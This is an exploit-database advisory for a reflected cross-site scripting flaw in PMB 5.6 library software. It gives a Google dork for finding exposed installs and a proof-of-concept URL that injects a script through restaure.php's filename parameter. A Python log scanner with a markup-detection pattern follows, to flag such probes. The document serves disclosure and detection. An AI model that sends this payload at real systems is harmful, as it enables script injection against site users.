## https://sploitus.com/exploit?id=PACKETSTORM:158462
# Exploit Title: PMB 5.6 Cross Site Scripting XSS  
# Google Dork: inurl:opac_css  
# Date: 20-04-2020  
# Exploit Author: 41-trk (Tarik Bakir)  
# Email: tarikbak999[at]gmail.com  
# Vendor Homepage: http://www.sigb.net  
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files  
# Affected versions: <= 5.6
  
-==== Vulnerability ====-  

The $filename parameter is not properly sanitized before it is echoed back by /admin/sauvegarde/restaure.php, allowing reflected cross-site scripting.

-==== POC ====-  
  
http://localhost/[PMB_PATH]/admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1
  
================================
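To spot this probe in web-server access logs, here is an added detection example (not from the advisory or from the PMB project) that flags requests to restaure.php whose filename value carries HTML markup, including URL-encoded and double-encoded forms; the log lines, paths and client addresses are constructed.

```python
"""Flag PMB restaure.php XSS probes in web-server access logs.
Added example (not from the advisory or PMB); log lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Common/combined log format: client, ident, user, [time], "METHOD path HTTP/x", status, bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) ')

# Markup fragments that have no business in a backup file name.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|javascript:|on[a-z]+\s*=', re.I)

def suspicious_filename(path_and_query: str) -> bool:
    """True when the request targets restaure.php and `filename` carries markup."""
    parts = urlsplit(path_and_query)
    if not parts.path.lower().endswith('/admin/sauvegarde/restaure.php'):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get('filename', []):
        # parse_qs already decoded once; decode again to catch double-encoded probes.
        decoded = unquote_plus(unquote_plus(value))
        if MARKUP_RE.search(decoded):
            return True
    return False

def scan(lines):
    """Return (client_ip, request_target) for each log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        if suspicious_filename(target):
            hits.append((ip, target))
    return hits

# Constructed sample lines (not real traffic); the first mirrors the advisory's PoC.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Apr/2020:10:00:01 +0000] "GET /pmb/admin/sauvegarde/restaure.php?filename=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&critical=1 HTTP/1.1" 200 512',
    '198.51.100.2 - - [20/Apr/2020:10:00:02 +0000] "GET /pmb/admin/sauvegarde/restaure.php?filename=backup_2020.sql&critical=1 HTTP/1.1" 200 4096',
    '203.0.113.7 - - [20/Apr/2020:10:00:03 +0000] "GET /pmb/opac_css/index.php?lvl=more_results HTTP/1.1" 200 1024',
]

if __name__ == '__main__':
    for ip, target in scan(SAMPLE_LOG):
        print(f'possible XSS probe from {ip}: {target}')
```

Pair a hit with the response status: a 200 on this path from an unauthenticated client is worth more attention than a redirect to the login page.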